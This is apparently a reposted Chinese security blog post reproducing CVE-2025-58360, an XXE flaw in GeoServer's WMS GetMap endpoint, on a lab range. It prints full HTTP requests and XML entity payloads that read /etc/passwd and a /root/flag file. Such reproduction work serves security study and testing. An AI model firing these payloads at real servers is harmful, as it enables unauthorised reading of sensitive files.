文章总结： 本文详细分析了GeoServer中存在的CVE-2025-58360XXE漏洞，该漏洞位于WMSGetMap端点，攻击者可通过恶意XML注入读取服务器敏感文件。文章提供了完整的漏洞复现步骤，包括POC代码、请求头设置和靶场测试方法，并给出了读取/etc/passwd和flag文件的具体示例。 综合评分： 78 文章分类： 漏洞分析,WEB安全,渗透测试,实战经验,漏洞预警

CVE复现 | CVE-2025-58360漏洞复现

原创

LRT凌日 LRT凌日

凌日网络与信息安全团队LapR1skT

2026年5月14日 11:00 重庆

在小说阅读器读本章

去阅读

免责声明：由于传播、利用本公众号凌日网络与信息安全团队所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，公众号凌日网络与信息安全团队及作者不为此承担任何责任，一旦造成后果请自行承担！如有侵权烦请告知，我们会立即删除并致歉。谢谢！

一、前言

GeoServer 是一款基于 Java 开发的开源地理空间服务器，主要用来处理、共享和展示地图数据。它遵循开放地理空间联盟（OGC）的通用标准，所以在地图制作和数据交互上非常灵活。

内置了 OpenLayers 地图库，能快速生成各种格式的地图（比如 PNG、JPEG、KML 等），还能兼容多种数据库（如 PostgreSQL、MySQL、Oracle ）和数据格式，支持上百种地图投影方式。它可以部署在任何支持 Java Servlet 的服务器上，是地理信息领域很常用的工具。

二、漏洞简介

GeoServer 存在一个 XML 外部实体注入（XXE）漏洞，该漏洞位于 /geoserver/wms 端点的 WMS GetMap 请求中，当服务器接收用户提交的 XML 格式地图样式定义（SLD）时，由于 XML 解析器未正确禁用外部实体引用功能，攻击者可构造恶意 XML 注入实体引用，进而读取服务器本地任意敏感文件（如 /etc/passwd、配置文件等）、获取系统信息、触发 SSRF 漏洞（具体效果取决于解析器实现），甚至导致服务器拒绝服务；下发环境后，可通过访问 /geoserver/web 进入 GeoServer 相关页面进行漏洞复现

三、poc

1. POST /geoserver/wms?service=WMS&version=1.1.0&request=GetMap&width=100&height=100&format=image/png&bbox=-180,-90,180,90 HTTP/1.1
2. Host: xxxxx
3. Cache-Control: max-age=0
4. Upgrade-Insecure-Requests:1
5. User-Agent:Mozilla/5.0(X11;Linux x86_64)AppleWebKit/537.36(KHTML, like Gecko)Chrome/144.0.0.0Safari/537.36
6. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
7. Accept-Encoding: gzip, deflate, br
8. Accept-Language: zh-CN,zh;q=0.9
9. Connection: keep-alive
10. Content-Length: 251
11. Content-Type: application/xml

15. <?xml version="1.0" encoding="UTF-8"?>
16. <!DOCTYPE foo [
17. <!ELEMENT foo ANY >
18. <!ENTITY xxe SYSTEM "file:///etc/passwd">
19. ]>
20. <StyledLayerDescriptor version="1.0.0">
21. <NamedLayer>
22. <Name>&xxe;</Name>
23. </NamedLayer>
24. </StyledLayerDescriptor>

四、漏洞复现

这里以春秋云境靶场环境为例

1. 请求 URL

plaintext

1. http://ip/geoserver/wms?service=WMS&version=1.1.0&request=GetMap&width=100&height=100&format=image/png&bbox=-180,-90,180,90

2. 选择POST请求

3. 请求头 Headers

1. Content-Type: application/xml

4. Post Data 数据包（先测 /etc/passwd）

测试漏洞有没有生效

1. <?xml version="1.0"&nbsp;encoding="UTF-8"?>
2. <!DOCTYPE foo [
3. <!ELEMENT foo ANY >
4. <!ENTITY xxe SYSTEM "file:///etc/passwd">
5. ]>
6. <StyledLayerDescriptorversion="1.0.0">
7. <NamedLayer>
8. <Name>&xxe;</Name>
9. </NamedLayer>
10. </StyledLayerDescriptor>

5. 更换请求体读flag

1. <?xml version="1.0"&nbsp;encoding="UTF-8"?>
2. <!DOCTYPE foo [
3. <!ELEMENT foo ANY >
4. <!ENTITY xxe SYSTEM "file:///root/flag">
5. ]>
6. <StyledLayerDescriptorversion="1.0.0">
7. <NamedLayer>
8. <Name>&xxe;</Name>
9. </NamedLayer>
10. </StyledLayerDescriptor>

五、参考文章

CVE-2025-58360 GeoServer XXE漏洞综合安全研究报告 – FreeBuf网络安全行业门户 （https://www.freebuf.com/articles/vuls/459694.html）

免责声明：由于传播、利用本公众号凌日网络与信息安全团队所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，公众号凌日网络与信息安全团队及作者不为此承担任何责任，一旦造成后果请自行承担！如有侵权烦请告知，我们会立即删除并致歉。谢谢！

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：凌日网络与信息安全团队LapR1skT LRT凌日 LRT凌日《CVE复现 | CVE-2025-58360漏洞复现》